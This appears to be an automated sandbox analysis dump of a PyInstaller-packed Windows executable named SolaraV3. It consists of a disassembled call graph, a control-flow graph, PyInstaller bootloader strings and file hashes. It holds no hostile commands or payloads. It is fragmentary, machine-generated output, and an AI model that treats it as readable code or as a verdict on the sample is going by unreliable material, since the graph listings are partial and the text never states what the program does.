7ff6dc710095 97425->97162 97426->97230 97427->97230 97428->97176 97429->97179 97430->97184 97431->97187 97432->97204 97433->97230 97434->97205 97435->97230 97437 7ff6dc70c559 97436->97437 97438 7ff6dc703ca7 97437->97438 97439 7ff6dc70c8e0 IsProcessorFeaturePresent 97437->97439 97438->97285 97440 7ff6dc70c8f8 97439->97440 97972 7ff6dc70cad8 RtlCaptureContext RtlLookupFunctionEntry RtlVirtualUnwind 97440->97972 97442 7ff6dc70c90b 97973 7ff6dc70c8a0 SetUnhandledExceptionFilter UnhandledExceptionFilter GetCurrentProcess TerminateProcess 97442->97973 97445->97215 97446->97230 97447->97203 97449 7ff6dc701c80 49 API calls 97448->97449 97450 7ff6dc704660 97449->97450 97450->97225 97451->97256 97452->97260 97453->97263 97454->97267 97455->97275 97456->97269 97457->97274 97458->97274 97459->97237 97461->97250 97462->97255 97463->97298 97464->97298 97466 7ff6dc7036bc GetModuleFileNameW 97465->97466 97466->97302 97466->97303 97468 7ff6dc7092bf FindClose 97467->97468 97469 7ff6dc7092d2 97467->97469 97468->97469 97470 7ff6dc70c550 _log10_special 8 API calls 97469->97470 97471 7ff6dc70371a 97470->97471 97471->97308 97471->97309 97472->97306 97473->97315 97474->97320 97475->97313 97476->97306 97478 7ff6dc710704 97477->97478 97501 7ff6dc710464 97478->97501 97480 7ff6dc71071d 97480->97331 97514 7ff6dc7103bc 97481->97514 97484->97337 97485->97370 97486->97342 97487->97370 97488->97349 97489->97370 97490->97360 97491->97370 97492->97366 97493->97370 97495 7ff6dc710119 97494->97495 97499 7ff6dc701b89 97494->97499 97530 7ff6dc714f08 11 API calls _set_fmode 97495->97530 97497 7ff6dc71011e 97531 7ff6dc71a8e0 37 API calls _invalid_parameter_noinfo 97497->97531 97499->97370 97500 7ff6dc702710 54 API calls _log10_special 97499->97500 97500->97370 97502 7ff6dc7104ce 97501->97502 97503 7ff6dc71048e 97501->97503 97502->97503 97505 7ff6dc7104da 97502->97505 97513 7ff6dc71a814 37 API calls 2 library calls 97503->97513 97512 7ff6dc71546c EnterCriticalSection 97505->97512 97506 7ff6dc7104b5 97506->97480 97508 7ff6dc7104df 97509 7ff6dc7105e8 71 API calls 97508->97509 97510 7ff6dc7104f1 97509->97510 97511 7ff6dc715478 _fread_nolock LeaveCriticalSection 97510->97511 97511->97506 97513->97506 97515 7ff6dc7103e6 97514->97515 97516 7ff6dc701a20 97514->97516 97515->97516 97517 7ff6dc710432 97515->97517 97518 7ff6dc7103f5 __scrt_get_show_window_mode 97515->97518 97516->97339 97516->97340 97527 7ff6dc71546c EnterCriticalSection 97517->97527 97528 7ff6dc714f08 11 API calls _set_fmode 97518->97528 97520 7ff6dc71043a 97522 7ff6dc71013c _fread_nolock 51 API calls 97520->97522 97524 7ff6dc710451 97522->97524 97523 7ff6dc71040a 97529 7ff6dc71a8e0 37 API calls _invalid_parameter_noinfo 97523->97529 97526 7ff6dc715478 _fread_nolock LeaveCriticalSection 97524->97526 97526->97516 97528->97523 97529->97516 97530->97497 97531->97499 97532->97381 97534 7ff6dc706375 97533->97534 97535 7ff6dc701c80 49 API calls 97534->97535 97536 7ff6dc7063b1 97535->97536 97537 7ff6dc7063dd 97536->97537 97538 7ff6dc7063ba 97536->97538 97539 7ff6dc704630 49 API calls 97537->97539 97621 7ff6dc702710 54 API calls _log10_special 97538->97621 97541 7ff6dc7063f5 97539->97541 97542 7ff6dc706413 97541->97542 97622 7ff6dc702710 54 API calls _log10_special 97541->97622 97611 7ff6dc704560 97542->97611 97545 7ff6dc70c550 _log10_special 8 API calls 97547 7ff6dc70336e 97545->97547 97547->97397 97564 7ff6dc706500 97547->97564 97548 7ff6dc70642b 97550 7ff6dc704630 49 API calls 97548->97550 97549 7ff6dc708e80 3 API calls 97549->97548 97551 7ff6dc706444 97550->97551 97552 7ff6dc706469 97551->97552 97553 7ff6dc706449 97551->97553 97617 7ff6dc708e80 97552->97617 97623 7ff6dc702710 54 API calls _log10_special 97553->97623 97556 7ff6dc706476 97557 7ff6dc706482 97556->97557 97558 7ff6dc7064c1 97556->97558 97559 7ff6dc709390 2 API calls 97557->97559 97625 7ff6dc705830 137 API calls 97558->97625 97561 7ff6dc70649a GetLastError 97559->97561 97624 7ff6dc702c50 51 API calls _log10_special 97561->97624 97563 7ff6dc7063d3 97563->97545 97626 7ff6dc705400 97564->97626 97566 7ff6dc706526 97567 7ff6dc70653f 97566->97567 97568 7ff6dc70652e 97566->97568 97633 7ff6dc704c90 97567->97633 97651 7ff6dc702710 54 API calls _log10_special 97568->97651 97572 7ff6dc70655c 97576 7ff6dc70656c 97572->97576 97578 7ff6dc70657d 97572->97578 97573 7ff6dc70654b 97652 7ff6dc702710 54 API calls _log10_special 97573->97652 97575 7ff6dc70653a 97575->97393 97653 7ff6dc702710 54 API calls _log10_special 97576->97653 97579 7ff6dc7065ad 97578->97579 97580 7ff6dc70659c 97578->97580 97582 7ff6dc7065cd 97579->97582 97583 7ff6dc7065bc 97579->97583 97654 7ff6dc702710 54 API calls _log10_special 97580->97654 97637 7ff6dc704d50 97582->97637 97655 7ff6dc702710 54 API calls _log10_special 97583->97655 97587 7ff6dc7065ed 97590 7ff6dc70660d 97587->97590 97591 7ff6dc7065fc 97587->97591 97588 7ff6dc7065dc 97656 7ff6dc702710 54 API calls _log10_special 97588->97656 97593 7ff6dc70661f 97590->97593 97595 7ff6dc706630 97590->97595 97657 7ff6dc702710 54 API calls _log10_special 97591->97657 97658 7ff6dc702710 54 API calls _log10_special 97593->97658 97597 7ff6dc70665a 97595->97597 97659 7ff6dc7172b0 73 API calls 97595->97659 97597->97575 97661 7ff6dc702710 54 API calls _log10_special 97597->97661 97599 7ff6dc706648 97660 7ff6dc7172b0 73 API calls 97599->97660 97602 7ff6dc706070 97601->97602 97602->97602 97603 7ff6dc706099 97602->97603 97609 7ff6dc7060b0 __vcrt_freefls 97602->97609 97693 7ff6dc702710 54 API calls _log10_special 97603->97693 97605 7ff6dc7060a5 97605->97395 97606 7ff6dc7061bb 97606->97395 97608 7ff6dc702710 54 API calls 97608->97609 97609->97606 97609->97608 97663 7ff6dc701470 97609->97663 97610->97397 97612 7ff6dc70456a 97611->97612 97613 7ff6dc709390 2 API calls 97612->97613 97614 7ff6dc70458f 97613->97614 97615 7ff6dc70c550 _log10_special 8 API calls 97614->97615 97616 7ff6dc7045b7 97615->97616 97616->97548 97616->97549 97618 7ff6dc709390 2 API calls 97617->97618 97619 7ff6dc708e94 LoadLibraryExW 97618->97619 97620 7ff6dc708eb3 __vcrt_freefls 97619->97620 97620->97556 97621->97563 97622->97542 97623->97563 97624->97563 97625->97563 97627 7ff6dc70542c 97626->97627 97628 7ff6dc705434 97627->97628 97629 7ff6dc7055d4 97627->97629 97662 7ff6dc716aa4 48 API calls 97627->97662 97628->97566 97630 7ff6dc705797 __vcrt_freefls 97629->97630 97631 7ff6dc7047d0 47 API calls 97629->97631 97630->97566 97631->97629 97634 7ff6dc704cc0 97633->97634 97635 7ff6dc70c550 _log10_special 8 API calls 97634->97635 97636 7ff6dc704d2a 97635->97636 97636->97572 97636->97573 97638 7ff6dc704d65 97637->97638 97639 7ff6dc701c80 49 API calls 97638->97639 97640 7ff6dc704db1 97639->97640 97641 7ff6dc701c80 49 API calls 97640->97641 97650 7ff6dc704e33 __vcrt_freefls 97640->97650 97642 7ff6dc704df0 97641->97642 97645 7ff6dc709390 2 API calls 97642->97645 97642->97650 97643 7ff6dc70c550 _log10_special 8 API calls 97644 7ff6dc704e7e 97643->97644 97644->97587 97644->97588 97646 7ff6dc704e06 97645->97646 97647 7ff6dc709390 2 API calls 97646->97647 97648 7ff6dc704e1d 97647->97648 97649 7ff6dc709390 2 API calls 97648->97649 97649->97650 97650->97643 97651->97575 97652->97575 97653->97575 97654->97575 97655->97575 97656->97575 97657->97575 97658->97575 97659->97599 97660->97597 97661->97575 97662->97627 97664 7ff6dc7045c0 108 API calls 97663->97664 97665 7ff6dc701493 97664->97665 97666 7ff6dc7014bc 97665->97666 97667 7ff6dc70149b 97665->97667 97668 7ff6dc7106d4 73 API calls 97666->97668 97716 7ff6dc702710 54 API calls _log10_special 97667->97716 97671 7ff6dc7014d1 97668->97671 97670 7ff6dc7014ab 97670->97609 97672 7ff6dc7014d5 97671->97672 97673 7ff6dc7014f8 97671->97673 97717 7ff6dc714f08 11 API calls _set_fmode 97672->97717 97677 7ff6dc701532 97673->97677 97678 7ff6dc701508 97673->97678 97675 7ff6dc7014da 97718 7ff6dc702910 54 API calls _log10_special 97675->97718 97679 7ff6dc70154b 97677->97679 97680 7ff6dc701538 97677->97680 97719 7ff6dc714f08 11 API calls _set_fmode 97678->97719 97687 7ff6dc7014f3 __vcrt_freefls 97679->97687 97688 7ff6dc71039c _fread_nolock 53 API calls 97679->97688 97689 7ff6dc7015d6 97679->97689 97694 7ff6dc701210 97680->97694 97683 7ff6dc701510 97720 7ff6dc702910 54 API calls _log10_special 97683->97720 97684 7ff6dc71004c 74 API calls 97686 7ff6dc7015c4 97684->97686 97686->97609 97687->97684 97688->97679 97721 7ff6dc714f08 11 API calls _set_fmode 97689->97721 97691 7ff6dc7015db 97722 7ff6dc702910 54 API calls _log10_special 97691->97722 97693->97605 97695 7ff6dc701268 97694->97695 97696 7ff6dc70126f 97695->97696 97697 7ff6dc701297 97695->97697 97727 7ff6dc702710 54 API calls _log10_special 97696->97727 97700 7ff6dc7012d4 97697->97700 97701 7ff6dc7012b1 97697->97701 97699 7ff6dc701282 97699->97687 97705 7ff6dc7012e6 97700->97705 97710 7ff6dc701309 memcpy_s 97700->97710 97728 7ff6dc714f08 11 API calls _set_fmode 97701->97728 97703 7ff6dc7012b6 97729 7ff6dc702910 54 API calls _log10_special 97703->97729 97730 7ff6dc714f08 11 API calls _set_fmode 97705->97730 97707 7ff6dc7012eb 97731 7ff6dc702910 54 API calls _log10_special 97707->97731 97708 7ff6dc71039c _fread_nolock 53 API calls 97708->97710 97710->97708 97711 7ff6dc710110 37 API calls 97710->97711 97712 7ff6dc7012cf __vcrt_freefls 97710->97712 97715 7ff6dc7013cf 97710->97715 97723 7ff6dc710adc 97710->97723 97711->97710 97712->97687 97732 7ff6dc702710 54 API calls _log10_special 97715->97732 97716->97670 97717->97675 97718->97687 97719->97683 97720->97687 97721->97691 97722->97687 97724 7ff6dc710b0c 97723->97724 97733 7ff6dc71082c 97724->97733 97726 7ff6dc710b2a 97726->97710 97727->97699 97728->97703 97729->97712 97730->97707 97731->97712 97732->97712 97734 7ff6dc71084c 97733->97734 97735 7ff6dc710879 97733->97735 97734->97735 97736 7ff6dc710856 97734->97736 97737 7ff6dc710881 97734->97737 97735->97726 97747 7ff6dc71a814 37 API calls 2 library calls 97736->97747 97740 7ff6dc71076c 97737->97740 97748 7ff6dc71546c EnterCriticalSection 97740->97748 97742 7ff6dc710789 97743 7ff6dc7107ac 74 API calls 97742->97743 97744 7ff6dc710792 97743->97744 97745 7ff6dc715478 _fread_nolock LeaveCriticalSection 97744->97745 97746 7ff6dc71079d 97745->97746 97746->97735 97747->97735 97751 7ff6dc7149de 97749->97751 97750 7ff6dc714a03 97767 7ff6dc71a814 37 API calls 2 library calls 97750->97767 97751->97750 97752 7ff6dc714a3f 97751->97752 97768 7ff6dc712c10 49 API calls _invalid_parameter_noinfo 97752->97768 97755 7ff6dc714a2d 97758 7ff6dc70c550 _log10_special 8 API calls 97755->97758 97756 7ff6dc714ad6 97759 7ff6dc714b1c 97756->97759 97761 7ff6dc714b40 97756->97761 97762 7ff6dc714af1 97756->97762 97763 7ff6dc714ae8 97756->97763 97757 7ff6dc71a948 Concurrency::details::SchedulerProxy::DeleteThis 11 API calls 97757->97755 97760 7ff6dc701cc8 97758->97760 97759->97757 97760->97159 97761->97759 97764 7ff6dc714b4a 97761->97764 97769 7ff6dc71a948 97762->97769 97763->97759 97763->97762 97766 7ff6dc71a948 Concurrency::details::SchedulerProxy::DeleteThis 11 API calls 97764->97766 97766->97755 97767->97755 97768->97756 97770 7ff6dc71a94d RtlFreeHeap 97769->97770 97771 7ff6dc71a97c 97769->97771 97770->97771 97772 7ff6dc71a968 GetLastError 97770->97772 97771->97755 97773 7ff6dc71a975 Concurrency::details::SchedulerProxy::DeleteThis 97772->97773 97775 7ff6dc714f08 11 API calls _set_fmode 97773->97775 97775->97771 97777 7ff6dc715ec8 97776->97777 97778 7ff6dc715eee 97777->97778 97780 7ff6dc715f21 97777->97780 97807 7ff6dc714f08 11 API calls _set_fmode 97778->97807 97782 7ff6dc715f27 97780->97782 97783 7ff6dc715f34 97780->97783 97781 7ff6dc715ef3 97808 7ff6dc71a8e0 37 API calls _invalid_parameter_noinfo 97781->97808 97809 7ff6dc714f08 11 API calls _set_fmode 97782->97809 97795 7ff6dc71ac28 97783->97795 97788 7ff6dc715f48 97810 7ff6dc714f08 11 API calls _set_fmode 97788->97810 97789 7ff6dc715f55 97802 7ff6dc71fecc 97789->97802 97792 7ff6dc715f68 97811 7ff6dc715478 LeaveCriticalSection 97792->97811 97794 7ff6dc704616 97794->97411 97812 7ff6dc7202d8 EnterCriticalSection 97795->97812 97797 7ff6dc71ac3f 97798 7ff6dc71ac9c 19 API calls 97797->97798 97799 7ff6dc71ac4a 97798->97799 97800 7ff6dc720338 _isindst LeaveCriticalSection 97799->97800 97801 7ff6dc715f3e 97800->97801 97801->97788 97801->97789 97813 7ff6dc71fbc8 97802->97813 97805 7ff6dc71ff26 97805->97792 97807->97781 97808->97794 97809->97794 97810->97794 97814 7ff6dc71fc03 __vcrt_InitializeCriticalSectionEx 97813->97814 97823 7ff6dc71fdca 97814->97823 97828 7ff6dc717a3c 51 API calls 3 library calls 97814->97828 97816 7ff6dc71fea1 97832 7ff6dc71a8e0 37 API calls _invalid_parameter_noinfo 97816->97832 97818 7ff6dc71fdd3 97818->97805 97825 7ff6dc726d54 97818->97825 97820 7ff6dc71fe35 97820->97823 97829 7ff6dc717a3c 51 API calls 3 library calls 97820->97829 97822 7ff6dc71fe54 97822->97823 97830 7ff6dc717a3c 51 API calls 3 library calls 97822->97830 97823->97818 97831 7ff6dc714f08 11 API calls _set_fmode 97823->97831 97833 7ff6dc726354 97825->97833 97828->97820 97829->97822 97830->97823 97831->97816 97832->97818 97834 7ff6dc726389 97833->97834 97835 7ff6dc72636b 97833->97835 97834->97835 97837 7ff6dc7263a5 97834->97837 97887 7ff6dc714f08 11 API calls _set_fmode 97835->97887 97844 7ff6dc726964 97837->97844 97838 7ff6dc726370 97888 7ff6dc71a8e0 37 API calls _invalid_parameter_noinfo 97838->97888 97842 7ff6dc72637c 97842->97805 97890 7ff6dc726698 97844->97890 97847 7ff6dc7269d9 97922 7ff6dc714ee8 11 API calls _set_fmode 97847->97922 97848 7ff6dc7269f1 97910 7ff6dc718520 97848->97910 97852 7ff6dc7269de 97923 7ff6dc714f08 11 API calls _set_fmode 97852->97923 97863 7ff6dc7263d0 97863->97842 97889 7ff6dc7184f8 LeaveCriticalSection 97863->97889 97887->97838 97888->97842 97891 7ff6dc7266c4 97890->97891 97899 7ff6dc7266de 97890->97899 97891->97899 97935 7ff6dc714f08 11 API calls _set_fmode 97891->97935 97893 7ff6dc7266d3 97936 7ff6dc71a8e0 37 API calls _invalid_parameter_noinfo 97893->97936 97895 7ff6dc7267ad 97906 7ff6dc72680a 97895->97906 97941 7ff6dc719b78 37 API calls 2 library calls 97895->97941 97896 7ff6dc72675c 97896->97895 97939 7ff6dc714f08 11 API calls _set_fmode 97896->97939 97899->97896 97937 7ff6dc714f08 11 API calls _set_fmode 97899->97937 97900 7ff6dc726806 97903 7ff6dc726888 97900->97903 97900->97906 97901 7ff6dc7267a2 97940 7ff6dc71a8e0 37 API calls _invalid_parameter_noinfo 97901->97940 97942 7ff6dc71a900 17 API calls _CallSETranslator 97903->97942 97905 7ff6dc726751 97938 7ff6dc71a8e0 37 API calls _invalid_parameter_noinfo 97905->97938 97906->97847 97906->97848 97943 7ff6dc7202d8 EnterCriticalSection 97910->97943 97922->97852 97923->97863 97935->97893 97936->97899 97937->97905 97938->97896 97939->97901 97940->97895 97941->97900 97945 7ff6dc7178f8 97944->97945 97948 7ff6dc7173d4 97945->97948 97947 7ff6dc717911 97947->97421 97949 7ff6dc71741e 97948->97949 97950 7ff6dc7173ef 97948->97950 97958 7ff6dc71546c EnterCriticalSection 97949->97958 97959 7ff6dc71a814 37 API calls 2 library calls 97950->97959 97953 7ff6dc717423 97954 7ff6dc717440 38 API calls 97953->97954 97955 7ff6dc71742f 97954->97955 97956 7ff6dc715478 _fread_nolock LeaveCriticalSection 97955->97956 97957 7ff6dc71740f 97956->97957 97957->97947 97959->97957 97961 7ff6dc70fe71 97960->97961 97962 7ff6dc70fe43 97960->97962 97966 7ff6dc70fe63 97961->97966 97970 7ff6dc71546c EnterCriticalSection 97961->97970 97971 7ff6dc71a814 37 API calls 2 library calls 97962->97971 97965 7ff6dc70fe88 97967 7ff6dc70fea4 72 API calls 97965->97967 97966->97425 97968 7ff6dc70fe94 97967->97968 97969 7ff6dc715478 _fread_nolock LeaveCriticalSection 97968->97969 97969->97966 97971->97966 97972->97442 98075 7ffb0c3a7b50 98076 7ffb0c3a7b68 98075->98076 98077 7ffb0c3a7c76 98076->98077 98078 7ffb0c351b4a 9 API calls 98076->98078 98078->98076

                                                                                                                                                                                                                              Control-flow Graph

                                                                                                                                                                                                                              • Executed
                                                                                                                                                                                                                              • Not Executed
                                                                                                                                                                                                                              control_flow_graph 0 7ff6dc701000-7ff6dc703806 call 7ff6dc70fe18 call 7ff6dc70fe20 call 7ff6dc70c850 call 7ff6dc7153f0 call 7ff6dc715484 call 7ff6dc7036b0 14 7ff6dc703814-7ff6dc703836 call 7ff6dc701950 0->14 15 7ff6dc703808-7ff6dc70380f 0->15 20 7ff6dc70383c-7ff6dc703856 call 7ff6dc701c80 14->20 21 7ff6dc70391b-7ff6dc703931 call 7ff6dc7045c0 14->21 16 7ff6dc703c97-7ff6dc703cb2 call 7ff6dc70c550 15->16 25 7ff6dc70385b-7ff6dc70389b call 7ff6dc708830 20->25 28 7ff6dc703933-7ff6dc703960 call 7ff6dc707f90 21->28 29 7ff6dc70396a-7ff6dc70397f call 7ff6dc702710 21->29 35 7ff6dc7038c1-7ff6dc7038cc call 7ff6dc714f30 25->35 36 7ff6dc70389d-7ff6dc7038a3 25->36 37 7ff6dc703984-7ff6dc7039a6 call 7ff6dc701c80 28->37 38 7ff6dc703962-7ff6dc703965 call 7ff6dc71004c 28->38 39 7ff6dc703c8f 29->39 47 7ff6dc7038d2-7ff6dc7038e1 call 7ff6dc708830 35->47 48 7ff6dc7039fc-7ff6dc703a2a call 7ff6dc708940 call 7ff6dc7089a0 * 3 35->48 40 7ff6dc7038a5-7ff6dc7038ad 36->40 41 7ff6dc7038af-7ff6dc7038bd call 7ff6dc7089a0 36->41 53 7ff6dc7039b0-7ff6dc7039b9 37->53 38->29 39->16 40->41 41->35 57 7ff6dc7039f4-7ff6dc7039f7 call 7ff6dc714f30 47->57 58 7ff6dc7038e7-7ff6dc7038ed 47->58 76 7ff6dc703a2f-7ff6dc703a3e call 7ff6dc708830 48->76 53->53 56 7ff6dc7039bb-7ff6dc7039d8 call 7ff6dc701950 53->56 56->25 68 7ff6dc7039de-7ff6dc7039ef call 7ff6dc702710 56->68 57->48 62 7ff6dc7038f0-7ff6dc7038fc 58->62 65 7ff6dc703905-7ff6dc703908 62->65 66 7ff6dc7038fe-7ff6dc703903 62->66 65->57 69 7ff6dc70390e-7ff6dc703916 call 7ff6dc714f30 65->69 66->62 66->65 68->39 69->76 79 7ff6dc703b45-7ff6dc703b53 76->79 80 7ff6dc703a44-7ff6dc703a47 76->80 81 7ff6dc703b59-7ff6dc703b5d 79->81 82 7ff6dc703a67 79->82 80->79 83 7ff6dc703a4d-7ff6dc703a50 80->83 84 7ff6dc703a6b-7ff6dc703a90 call 7ff6dc714f30 81->84 82->84 85 7ff6dc703b14-7ff6dc703b17 83->85 86 7ff6dc703a56-7ff6dc703a5a 83->86 95 7ff6dc703a92-7ff6dc703aa6 call 7ff6dc708940 84->95 96 7ff6dc703aab-7ff6dc703ac0 84->96 88 7ff6dc703b2f-7ff6dc703b40 call 7ff6dc702710 85->88 89 7ff6dc703b19-7ff6dc703b1d 85->89 86->85 87 7ff6dc703a60 86->87 87->82 97 7ff6dc703c7f-7ff6dc703c87 88->97 89->88 91 7ff6dc703b1f-7ff6dc703b2a 89->91 91->84 95->96 99 7ff6dc703be8-7ff6dc703bfa call 7ff6dc708830 96->99 100 7ff6dc703ac6-7ff6dc703aca 96->100 97->39 108 7ff6dc703c2e 99->108 109 7ff6dc703bfc-7ff6dc703c02 99->109 102 7ff6dc703ad0-7ff6dc703ae8 call 7ff6dc715250 100->102 103 7ff6dc703bcd-7ff6dc703be2 call 7ff6dc701940 100->103 113 7ff6dc703b62-7ff6dc703b7a call 7ff6dc715250 102->113 114 7ff6dc703aea-7ff6dc703b02 call 7ff6dc715250 102->114 103->99 103->100 115 7ff6dc703c31-7ff6dc703c40 call 7ff6dc714f30 108->115 111 7ff6dc703c04-7ff6dc703c1c 109->111 112 7ff6dc703c1e-7ff6dc703c2c 109->112 111->115 112->115 124 7ff6dc703b7c-7ff6dc703b80 113->124 125 7ff6dc703b87-7ff6dc703b9f call 7ff6dc715250 113->125 114->103 126 7ff6dc703b08-7ff6dc703b0f 114->126 122 7ff6dc703d41-7ff6dc703d63 call 7ff6dc7044e0 115->122 123 7ff6dc703c46-7ff6dc703c4a 115->123 137 7ff6dc703d65-7ff6dc703d6f call 7ff6dc704630 122->137 138 7ff6dc703d71-7ff6dc703d82 call 7ff6dc701c80 122->138 127 7ff6dc703cd4-7ff6dc703ce6 call 7ff6dc708830 123->127 128 7ff6dc703c50-7ff6dc703c5f call 7ff6dc7090e0 123->128 124->125 139 7ff6dc703ba1-7ff6dc703ba5 125->139 140 7ff6dc703bac-7ff6dc703bc4 call 7ff6dc715250 125->140 126->103 144 7ff6dc703d35-7ff6dc703d3c 127->144 145 7ff6dc703ce8-7ff6dc703ceb 127->145 142 7ff6dc703cb3-7ff6dc703cbd call 7ff6dc708660 128->142 143 7ff6dc703c61 128->143 152 7ff6dc703d87-7ff6dc703d96 137->152 138->152 139->140 140->103 155 7ff6dc703bc6 140->155 161 7ff6dc703cbf-7ff6dc703cc6 142->161 162 7ff6dc703cc8-7ff6dc703ccf 142->162 149 7ff6dc703c68 call 7ff6dc702710 143->149 144->149 145->144 150 7ff6dc703ced-7ff6dc703d10 call 7ff6dc701c80 145->150 163 7ff6dc703c6d-7ff6dc703c77 149->163 167 7ff6dc703d12-7ff6dc703d26 call 7ff6dc702710 call 7ff6dc714f30 150->167 168 7ff6dc703d2b-7ff6dc703d33 call 7ff6dc714f30 150->168 158 7ff6dc703dbc-7ff6dc703dd2 call 7ff6dc709390 152->158 159 7ff6dc703d98-7ff6dc703d9f 152->159 155->103 171 7ff6dc703dd4 158->171 172 7ff6dc703de0-7ff6dc703dfc SetDllDirectoryW 158->172 159->158 165 7ff6dc703da1-7ff6dc703da5 159->165 161->149 162->152 163->97 165->158 169 7ff6dc703da7-7ff6dc703db6 LoadLibraryExW 165->169 167->163 168->152 169->158 171->172 175 7ff6dc703e02-7ff6dc703e11 call 7ff6dc708830 172->175 176 7ff6dc703ef9-7ff6dc703f00 172->176 189 7ff6dc703e13-7ff6dc703e19 175->189 190 7ff6dc703e2a-7ff6dc703e34 call 7ff6dc714f30 175->190 178 7ff6dc704000-7ff6dc704008 176->178 179 7ff6dc703f06-7ff6dc703f0d 176->179 183 7ff6dc70402d-7ff6dc704038 call 7ff6dc7036a0 call 7ff6dc703360 178->183 184 7ff6dc70400a-7ff6dc704027 PostMessageW GetMessageW 178->184 179->178 182 7ff6dc703f13-7ff6dc703f1d call 7ff6dc7033c0 179->182 182->163 196 7ff6dc703f23-7ff6dc703f37 call 7ff6dc7090c0 182->196 200 7ff6dc70403d-7ff6dc70405f call 7ff6dc703670 call 7ff6dc706fc0 call 7ff6dc706d70 183->200 184->183 193 7ff6dc703e25-7ff6dc703e27 189->193 194 7ff6dc703e1b-7ff6dc703e23 189->194 201 7ff6dc703eea-7ff6dc703ef4 call 7ff6dc708940 190->201 202 7ff6dc703e3a-7ff6dc703e40 190->202 193->190 194->193 209 7ff6dc703f5c-7ff6dc703f9f call 7ff6dc708940 call 7ff6dc7089e0 call 7ff6dc706fc0 call 7ff6dc706d70 call 7ff6dc7088e0 196->209 210 7ff6dc703f39-7ff6dc703f56 PostMessageW GetMessageW 196->210 201->176 202->201 206 7ff6dc703e46-7ff6dc703e4c 202->206 207 7ff6dc703e4e-7ff6dc703e50 206->207 208 7ff6dc703e57-7ff6dc703e59 206->208 212 7ff6dc703e52 207->212 213 7ff6dc703e5f-7ff6dc703e7b call 7ff6dc706dc0 call 7ff6dc707340 207->213 208->176 208->213 248 7ff6dc703fa1-7ff6dc703fb7 call 7ff6dc708ed0 call 7ff6dc7088e0 209->248 249 7ff6dc703fed-7ff6dc703ffb call 7ff6dc701900 209->249 210->209 212->176 227 7ff6dc703e7d-7ff6dc703e84 213->227 228 7ff6dc703e86-7ff6dc703e8d 213->228 230 7ff6dc703ed3-7ff6dc703ee8 call 7ff6dc702a50 call 7ff6dc706fc0 call 7ff6dc706d70 227->230 231 7ff6dc703e8f-7ff6dc703e9c call 7ff6dc706e00 228->231 232 7ff6dc703ea7-7ff6dc703eb1 call 7ff6dc7071b0 228->232 230->176 231->232 246 7ff6dc703e9e-7ff6dc703ea5 231->246 242 7ff6dc703eb3-7ff6dc703eba 232->242 243 7ff6dc703ebc-7ff6dc703eca call 7ff6dc7074f0 232->243 242->230 243->176 256 7ff6dc703ecc 243->256 246->230 248->249 261 7ff6dc703fb9-7ff6dc703fce 248->261 249->163 256->230 262 7ff6dc703fd0-7ff6dc703fe3 call 7ff6dc702710 call 7ff6dc701900 261->262 263 7ff6dc703fe8 call 7ff6dc702a50 261->263 262->163 263->249
                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                              • Source File: 00000002.00000002.2046400546.00007FF6DC701000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6DC700000, based on PE: true
                                                                                                                                                                                                                              • Associated: 00000002.00000002.2046314384.00007FF6DC700000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000002.00000002.2046615459.00007FF6DC72B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000002.00000002.2046695461.00007FF6DC73E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000002.00000002.2046695461.00007FF6DC741000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000002.00000002.2046842418.00007FF6DC744000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                              • Snapshot File: hcaresult_2_2_7ff6dc700000_SolaraV3.jbxd
                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                              • API ID: ErrorFileLastModuleName
                                                                                                                                                                                                                              • String ID: Could not create temporary directory!$Could not load PyInstaller's embedded PKG archive from the executable (%s)$Could not side-load PyInstaller's PKG archive from external file (%s)$Failed to convert DLL search path!$Failed to initialize security descriptor for temporary directory!$Failed to load Tcl/Tk shared libraries for splash screen!$Failed to load splash screen resources!$Failed to remove temporary directory: %s$Failed to start splash screen!$Failed to unpack splash screen dependencies from PKG archive!$Invalid value in _PYI_PARENT_PROCESS_LEVEL: %s$MEI$PYINSTALLER_RESET_ENVIRONMENT$PYINSTALLER_STRICT_UNPACK_MODE$PYINSTALLER_SUPPRESS_SPLASH_SCREEN$Path exceeds PYI_PATH_MAX limit.$Py_GIL_DISABLED$VCRUNTIME140.dll$_PYI_APPLICATION_HOME_DIR$_PYI_APPLICATION_HOME_DIR not set for onefile child process!$_PYI_ARCHIVE_FILE$_PYI_PARENT_PROCESS_LEVEL$_PYI_SPLASH_IPC$bye-runtime-tmpdir$pkg$pyi-contents-directory$pyi-disable-windowed-traceback$pyi-python-flag
                                                                                                                                                                                                                              • API String ID: 2776309574-3273434969
                                                                                                                                                                                                                              • Opcode ID: 9b17f683483ed456cfa5d3adfaaad0906d1924fbd3de9cf6bb050ba9cf488250
                                                                                                                                                                                                                              • Instruction ID: dfc6b9dcc23d036ac38d1d12981a41f8e3d0fca2f62b258947a36f72bebd2efd
                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 9b17f683483ed456cfa5d3adfaaad0906d1924fbd3de9cf6bb050ba9cf488250
                                                                                                                                                                                                                              • Instruction Fuzzy Hash: E632BD21A1CA8A91FA39D722D4653BD6771AF44784F844133DA5DC32C6EF2EE57AE300
                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                              • Source File: 00000002.00000002.2050155704.00007FFB0C351000.00000040.00000001.01000000.00000010.sdmp, Offset: 00007FFB0C350000, based on PE: true
                                                                                                                                                                                                                              • Associated: 00000002.00000002.2050110758.00007FFB0C350000.00000002.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000002.00000002.2050155704.00007FFB0C3C4000.00000040.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000002.00000002.2050155704.00007FFB0C3C6000.00000040.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000002.00000002.2050155704.00007FFB0C3E9000.00000040.00000001.01000000.00000010.sdmpDownload File
